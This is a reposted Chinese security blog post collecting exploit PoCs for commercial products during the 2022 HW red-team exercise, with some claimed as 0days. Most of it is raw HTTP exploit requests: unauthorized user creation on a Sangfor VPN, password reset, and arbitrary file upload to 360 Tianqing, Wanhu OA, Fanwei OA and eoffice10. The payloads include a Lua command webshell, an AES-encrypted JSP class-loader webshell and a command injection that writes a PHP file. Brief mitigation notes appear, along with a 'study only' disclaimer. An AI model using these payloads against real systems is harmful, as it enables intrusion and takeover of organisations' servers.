【2022护网情报更新】护网最新漏洞曝光,含POC

admin 2022年7月30日00:44:49HW&HVV评论1,217 views9120字阅读30分24秒阅读模式


【2022护网情报更新】护网最新漏洞曝光,含POC
【2022护网情报更新】护网最新漏洞曝光,含POC
【2022护网情报更新】护网最新漏洞曝光,含POC

声明

【2022护网情报更新】护网最新漏洞曝光,含POC
【2022护网情报更新】护网最新漏洞曝光,含POC



【2022护网情报更新】护网最新漏洞曝光,含POC

以下POC不保证百分百能用,禁止用于非法用途,仅供学习使用!

【2022护网情报更新】护网最新漏洞曝光,含POC



【2022护网情报更新】护网最新漏洞曝光,含POC

1、深信服VPN任意用户添加漏洞

漏洞等级:严重,0day漏洞

影响范围:未知

漏洞详情:用户管理接口的权限控制出现漏洞,攻击者可任意添加用户。

【2022护网情报更新】护网最新漏洞曝光,含POC


参考POC:POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1Host: xxxxxxCookie: language=zh_CN; sinfor_session_id=W730120C88755A7D932019B349CCAC63; PHPSESSID=cb12753556d734509d4092baabfb55dd; x-anti-csrf-gcs=A7DBB1DC0050737E; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7DContent-Length: 707Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Sec-Ch-Ua-Platform: "macOS"Accept: */*Origin: https://xxxxxxX-Forwarded-For: 127.0.0.1X-Originating-Ip: 127.0.0.1X-Remote-Ip: 127.0.0.1X-Remote-Addr: 127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D



【2022护网情报更新】护网最新漏洞曝光,含POC

2、安恒数据大脑 API 网关任意密码重置漏洞

漏洞等级:严重,

可能为 0day 漏洞,目前捕获到在野的利用 POC;

影响范围:未知;

漏洞详情:在前端代码中包含重置密码的连接以及密码加密方式

【2022护网情报更新】护网最新漏洞曝光,含POC


POC如下:

POST /q/common-permission/public/users/forgetPassword HTTP/1.1 Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept-Language: en-US,en;q=0.5 Content-type: application/json Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 104 {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}



【2022护网情报更新】护网最新漏洞曝光,含POC

3、360 天擎任意文件上传

漏洞等级:严重

影响范围:未知,应该是个0day

漏洞详情:/api/client_upload_file.json 存在任意文件上传漏洞

【2022护网情报更新】护网最新漏洞曝光,含POC


POC如下:

POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 323 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox Q Referer: xxxxx Accept-Encoding: gzip ------WebKitFormBoundaryLx7ATxHThfk91oxQ Content-Disposition: form-data; name="file"; filename="flash.php" Content-Type: application/xxxx if ngx.req.get_uri_args().cmd then cmd = ngx.req.get_uri_args().cmd local t = io.popen(cmd) local a = t:read("*all") ngx.say(a) end------WebKitFormBoundaryLx7ATxHThfk91oxQ--



【2022护网情报更新】护网最新漏洞曝光,含POC

4、万户 OA 文件上传漏洞

漏洞等级:严重

漏洞详情:/defaultroot/officeserverservlet 路径存在文件上传漏洞

【2022护网情报更新】护网最新漏洞曝光,含POC


POC:POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li ke Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN Connection: close DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE VQ OPTION=U0FWRUZJTEU= RECORDID= isDoc=dHJ1ZQ== moduleType=Z292ZG9jdW1lbnQ= FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA== 111111111111111111111111111111111111111 <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";/*man ba*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec (k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6 4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex t);}%>


【2022护网情报更新】护网最新漏洞曝光,含POC

DBSTEP V3.0 170 0 1000

170 是控制从报文中什么地方读取

1000 是控制 webshell 源代码内容大小

【2022护网情报更新】护网最新漏洞曝光,含POC




【2022护网情报更新】护网最新漏洞曝光,含POC

5、泛微 OA 文件上传

漏洞等级:严重

漏洞详情:/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞

【2022护网情报更新】护网最新漏洞曝光,含POC


POC:POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 393 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="secId" 1 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="Filedata"; filename="testlog.txt" Test ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="plandetailid" 1 ------WebKitFormBoundarymVk33liI64J7GQaK—



【2022护网情报更新】护网最新漏洞曝光,含POC

泛微OA /defaultroot/officeserverservlet :

:确认为历史漏洞;

详情:/officeserverservlet 路径文件上传

【2022护网情报更新】护网最新漏洞曝光,含POC


POC:POST /OfficeServer HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 207 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="aaa" {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'} ------WebKitFormBoundarymVk33liI64J7GQaK—


【2022护网情报更新】护网最新漏洞曝光,含POC

7、泛微微 eoffice10 前台 getshell(eoffice10/version.json): 

漏洞等级:严重,可能为 0day 漏洞;

漏洞详情:版本号:http://XXXXXXX:8010/eoffice10/version.json

【2022护网情报更新】护网最新漏洞曝光,含POC


<form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' enctype="multipart/form-data" > <input type="file" name="FileData"/></br></br> <input type="text" name="FormData" value="1"/></br></br> <button type=submit value="上传">上传</button> </form>
POCPOST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: XXXXXXXX:8010 Content-Length: 378 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FileData"; filename="1.jpg" Content-Type: image/jpeg <?php echo md5(1);?> ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FormData" {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--


【2022护网情报更新】护网最新漏洞曝光,含POC

8、WebLogic中间件任意命令执行漏洞

漏洞等级:严重,厂商尚未发布补丁

影响范围:未知

漏洞详情:攻击者可利用T3/IIOP接口发送恶意内容,导致任意命令执行

【2022护网情报更新】护网最新漏洞曝光,含POC



【2022护网情报更新】护网最新漏洞曝光,含POC

9、XxxNC前台反序列化漏洞:

漏洞等级:严重,确认为历史漏洞;

漏洞影响版本: nc 6.5;

【2022护网情报更新】护网最新漏洞曝光,含POC


【2022护网情报更新】护网最新漏洞曝光,含POC

10、Txxxb的前台未授权反序列化漏洞:

漏洞等级:严重,确认为 0day 漏洞,目前漏洞在野利用;

【2022护网情报更新】护网最新漏洞曝光,含POC




【2022护网情报更新】护网最新漏洞曝光,含POC

11、天融信天眼系统命令执行0day漏洞

漏洞等级:严重

影响范围:未知

漏洞详情:攻击者通过序列号加密要执行的攻击payload,再通过另一个未授权的接口将攻击payload上载到服务器,由服务器解密并执行此段payload,从而实现远程命令执行,获取系统服务器权限。

应急防护: 

先禁止访问漏洞路径:/skyeye/home/security_service/heartbeat /skyeye/home/security_service/add_commands

检查所有安全流量监控设备是否存在对外映射,如有一律停止映射

3)添加攻击特征进行监控:/skyeye/home/security_service/heartbeat /skyeye/home/security_service/add_commands

【2022护网情报更新】护网最新漏洞曝光,含POC



【2022护网情报更新】护网最新漏洞曝光,含POC

12、天融信 - 上网行为管理系统 一句话木马

【2022护网情报更新】护网最新漏洞曝光,含POC


/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a






原文始发于微信公众号(安全透视镜):【2022护网情报更新】护网最新漏洞曝光,含POC

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月30日00:44:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【2022护网情报更新】护网最新漏洞曝光,含POC https://cn-sec.com/archives/1210653.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: